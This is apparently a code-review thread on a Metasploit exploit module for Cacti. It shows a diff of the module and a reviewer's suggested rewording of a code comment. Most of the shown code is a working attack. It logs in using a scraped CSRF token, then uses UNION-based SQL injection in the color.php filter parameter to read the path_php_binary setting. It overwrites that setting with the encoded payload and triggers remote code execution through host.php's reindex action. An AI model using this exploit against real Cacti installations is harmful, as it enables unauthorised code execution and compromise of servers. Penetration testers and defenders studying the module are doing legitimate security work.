modules/exploits/unix/http/cacti_filter_sqli_rce.rb

```diff
@@ -0,0 +1,220 @@
+        end
+      end
+
+      print_status('Backing-up path_php_binary value')
+      res = inject(cookie, "')+UNION+SELECT+1,value,3,4,5,6,7+from+settings+where+name='path_php_binary';")
+
+      # return value:
+      # "name","hex"
+      # "","FEFCFF"
+      # "/usr/bin/php","3"
+      php_binary = res.body.split.last.split(',')[0].gsub('"', '') # take last entry on page, and split to value
+      print_good("path_php_binary: #{php_binary}")
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to retrieve path_php_binary from server") unless php_binary
+
+      print_status('Uploading payload')
+      pload = Rex::Text.uri_encode(payload.encoded)
+      begin
+        inject(cookie, "')+UNION+SELECT+1,2,3,4,5,6,7;update+settings+set+value='#{pload}'+where+name='path_php_binary';")
+
+        print_status('Triggering payload')
+        send_request_cgi(
+          'uri' => normalize_uri(target_uri.path, 'host.php'),
+          'cookie' => cookie,
+          'vars_get' => {
+            'action' => 'reindex'
+          }
+        )
+      ensure
+        resetsqli(php_binary)
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def login
+    print_status('Grabbing CSRF')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'index.php')
+    )
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+    /name='__csrf_magic' value="(?<csrf>[^"]+)"/ =~ res.body
+    fail_with(Failure::UnexpectedReply, 'Unable to find CSRF token') unless csrf
+
+    print_good("CSRF: #{csrf}")
+
+    cookie = res.get_cookies
+
+    print_status('Attempting login')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'POST',
+      'cookie' => cookie,
+      'vars_post' => {
+        'login_username' => datastore['USERNAME'],
+        'login_password' => datastore['PASSWORD'],
+        'action' => 'login',
+        '__csrf_magic' => csrf
+      }
+    )
+
+    if res && res.code != 302
+      fail_with(Failure::NoAccess, "#{peer} - Invalid credentials (response code: #{res.code})")
+    end
+    cookie
+  end
+
+  def inject(cookie, content)
+    res = send_request_raw(
+      'uri' => "#{normalize_uri(target_uri.path, 'color.php')}?action=export&header=false&filter=1#{content}--+-",
+      'cookie' => cookie
+    )
+
+    if res && res.code != 200
+      fail_with(Failure::UnexpectedReply, "#{peer} - Injection Failed (response code: #{res.code})")
+    end
+    res
+  end
+
+  def resetsqli(php_binary)
+    print_status('Cleaning up environment')
+    cookie = login # any request with our cookie now dont get a response, so we'll need to login a 2nd time to reset our value correctly
```

Comment:
Still not sure on the wording here, but maybe something like?

```suggestion
    cookie = login # any subsequent requests with our cookie will fail, so we'll need to login a second time to reset our cookie correctly
```